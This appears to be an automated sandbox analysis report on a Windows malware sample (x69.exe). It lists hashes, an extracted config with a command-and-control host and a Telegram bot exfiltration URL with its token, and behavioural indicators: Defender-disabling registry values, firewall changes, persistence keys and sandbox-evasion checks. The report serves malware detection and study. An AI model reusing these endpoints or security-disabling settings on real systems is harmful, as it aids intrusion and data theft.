Analysis
-
max time kernel
102s -
max time network
108s -
platform
windows10-2004_x64 -
resource
win10v2004-20250502-en -
resource tags
arch:x64arch:x86image:win10v2004-20250502-enlocale:en-usos:windows10-2004-x64system -
submitted
19/05/2025, 21:14
Static task
static1
Behavioral task
behavioral1
Sample
x69.exe
Resource
win10v2004-20250502-en
General
-
Target
x69.exe
-
Size
285KB
-
MD5
20841606ce69632f258221219aeee09b
-
SHA1
b72918797186774598792c47b66d5857be59f576
-
SHA256
1ca064f8c8eb72cd0cfda466bb582318c93d2856a89bcf323b37d820f05fdc83
-
SHA512
aa1d6dcc49a66a5cef5fc64cae299c250bb5327d8d2e985db83e568b9d5acdde3b58249797f84fddcabf21210e194fa2ae3ca6b178286a3563d9574937e2b72e
-
SSDEEP
6144:3RIUGV77XEc5EDEhp19jyVyFSXnIHq1h8tkEsjuIMN9lLk:uUG5oc5EDAU0F+18guI
Malware Config
Extracted
xworm
3.1
grayhatgroupontop.zapto.org:1177
-
Install_directory
%AppData%
-
install_file
USB.exe
-
telegram
https://api.telegram.org/bot7717722960:AAGvuHVf2skcG3rQxo21EcgaQuXDN-eZ9zs/sendMessage?chat_id=6757433004
Extracted
bdaejec
ddos.dnsnb8.net
Extracted
gurcu
https://api.telegram.org/bot7717722960:AAGvuHVf2skcG3rQxo21EcgaQuXDN-eZ9zs/sendMessage?chat_id=6757433004
Extracted
latentbot
grayhatgroupontop.zapto.org
Signatures
-
Bdaejec family
-
Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource yara_rule behavioral1/files/0x00080000000240eb-81.dat disable_win_def -
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x0005000000022a80-21.dat family_xworm behavioral1/memory/980-23-0x0000000000FD0000-0x0000000000FE8000-memory.dmp family_xworm -
Detects Bdaejec Backdoor. 5 IoCs
Bdaejec is backdoor written in C++.
resource yara_rule behavioral1/memory/2456-563-0x0000000000BB0000-0x0000000000BB9000-memory.dmp family_bdaejec_backdoor behavioral1/memory/4120-562-0x0000000000BB0000-0x0000000000BB9000-memory.dmp family_bdaejec_backdoor behavioral1/memory/4120-1553-0x0000000000BB0000-0x0000000000BB9000-memory.dmp family_bdaejec_backdoor behavioral1/memory/2456-1554-0x0000000000BB0000-0x0000000000BB9000-memory.dmp family_bdaejec_backdoor behavioral1/memory/2864-1555-0x00000000009D0000-0x00000000009D9000-memory.dmp family_bdaejec_backdoor -
Gurcu family
-
Latentbot family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" reg.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 21 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe -
Modifies security service 2 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 4092 created 616 4092 powershell.EXE 5 -
Xworm family
-
pid Process 1432 powershell.exe 5032 powershell.exe 3984 powershell.exe 3756 powershell.exe 3596 powershell.exe 2412 powershell.exe 3908 powershell.exe 4080 powershell.exe 4148 powershell.exe 4828 powershell.exe 3264 powershell.exe 4148 powershell.exe 4080 powershell.exe 4308 powershell.exe 2580 powershell.exe 3572 powershell.exe 2424 powershell.exe 3708 powershell.exe 4148 powershell.exe 3192 powershell.exe 3400 powershell.exe 1700 powershell.exe 2580 powershell.exe 4088 powershell.exe 4436 powershell.exe 4692 powershell.exe 1444 powershell.exe 4148 powershell.exe 1444 powershell.exe 3400 powershell.exe 3972 powershell.exe 844 powershell.exe 216 powershell.exe 4056 powershell.exe 1560 powershell.exe 4092 powershell.EXE 4824 powershell.exe 3176 powershell.exe 2840 powershell.exe 1432 powershell.exe 3956 powershell.exe 2580 powershell.exe 4172 powershell.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 3752 netsh.exe 4160 netsh.exe -
resource yara_rule behavioral1/files/0x000b000000023f27-50.dat aspack_v212_v242 -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\Control Panel\International\Geo\Nation x69Disable-winDefender.exe Key value queried \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\Control Panel\International\Geo\Nation x69Disable-winDefender.exe Key value queried \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\Control Panel\International\Geo\Nation x69.exe Key value queried \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\Control Panel\International\Geo\Nation x69.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x69.lnk x69.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x69.lnk x69.exe -
Executes dropped EXE 11 IoCs
pid Process 980 x69.exe 4556 x69.exe 2612 x69Disable-winDefender.exe 3432 x69Disable-winDefender.exe 4120 izTLZKj.exe 2456 izTLZKj.exe 1864 x69install.exe 2864 iyMbXS.exe 3136 x69install.exe 4600 x69.exe 3352 x69.exe -
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\x69Disable-winDefender = "C:\\Users\\Admin\\AppData\\Roaming\\x69Disable-winDefender.exe" x69.exe Set value (str) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\x69install = "C:\\Users\\Admin\\AppData\\Roaming\\x69install.exe" x69.exe Set value (str) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\x69 = "C:\\Users\\Admin\\AppData\\Roaming\\x69.exe" x69.exe Set value (str) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\x69 = "C:\\Users\\Admin\\AppData\\Roaming\\x69.exe" x69.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 20 ip-api.com -
Modifies Security services 2 TTPs 8 IoCs
Modifies the startup behavior of a security service.
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4" reg.exe -
Drops file in System32 directory 10 IoCs
description ioc Process File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4092 set thread context of 3508 4092 powershell.EXE 245 -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\3DViewer.exe iyMbXS.exe File opened for modification C:\Program Files\Google\Chrome\Application\133.0.6943.60\chrome_pwa_launcher.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\javaw.exe izTLZKj.exe File opened for modification C:\Program Files\Microsoft Office 15\ClientX64\IntegratedOffice.exe izTLZKj.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\MixedRealityPortal.Brokered.exe izTLZKj.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\PeopleApp.exe izTLZKj.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Maps.exe izTLZKj.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe iyMbXS.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\jar.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\unpack200.exe izTLZKj.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\IEContentService.exe izTLZKj.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DWTRIG20.EXE izTLZKj.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\codecpacks.VP9.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\javac.exe iyMbXS.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSQRY32.EXE izTLZKj.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\jp2launcher.exe iyMbXS.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\filecompare.exe iyMbXS.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeBackgroundHost.exe iyMbXS.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exe iyMbXS.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\createdump.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\jp2launcher.exe izTLZKj.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstallerElevatedAppServiceClient.exe izTLZKj.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe izTLZKj.exe File opened for modification C:\Program Files\Microsoft Office\root\Client\AppVDllSurrogate64.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\javaw.exe izTLZKj.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PPTICO.EXE izTLZKj.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\jinfo.exe iyMbXS.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\unpack200.exe iyMbXS.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\ScreenSketch.exe iyMbXS.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\javadoc.exe izTLZKj.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\msoia.exe izTLZKj.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\VPREVIEW.EXE izTLZKj.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\EQUATION\eqnedt32.exe izTLZKj.exe File opened for modification C:\Program Files\Mozilla Firefox\private_browsing.exe izTLZKj.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\fmui\fmui.exe izTLZKj.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exe izTLZKj.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\javacpl.exe izTLZKj.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE izTLZKj.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe izTLZKj.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\keytool.exe iyMbXS.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.exe iyMbXS.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\WORDICON.EXE iyMbXS.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Maps.exe iyMbXS.exe File opened for modification C:\Program Files\Google\Chrome\Application\133.0.6943.60\Installer\setup.exe izTLZKj.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exe izTLZKj.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\excelcnv.exe izTLZKj.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\SETLANG.EXE izTLZKj.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\XLICONS.EXE izTLZKj.exe File opened for modification C:\Program Files\Mozilla Firefox\pingsender.exe izTLZKj.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\View3D.ResourceResolver.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\tnameserv.exe izTLZKj.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE izTLZKj.exe File opened for modification C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe izTLZKj.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\WindowsCamera.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\jps.exe iyMbXS.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\wsimport.exe iyMbXS.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\javaws.exe iyMbXS.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\klist.exe iyMbXS.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\jcmd.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\rmiregistry.exe izTLZKj.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exe izTLZKj.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language x69install.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language x69Disable-winDefender.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language x69Disable-winDefender.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language izTLZKj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language izTLZKj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language x69install.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language iyMbXS.exe -
Checks SCSI registry key(s) 3 TTPs 21 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 wmiprvse.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString mousocoreworker.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU mousocoreworker.exe -
Modifies data under HKEY_USERS 60 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Set value (data) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\fe-c3-b4-f3-a1-42\WpadDecisionTime = e7553a3503c9db01 svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Mon, 19 May 2025 21:16:27 GMT" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created 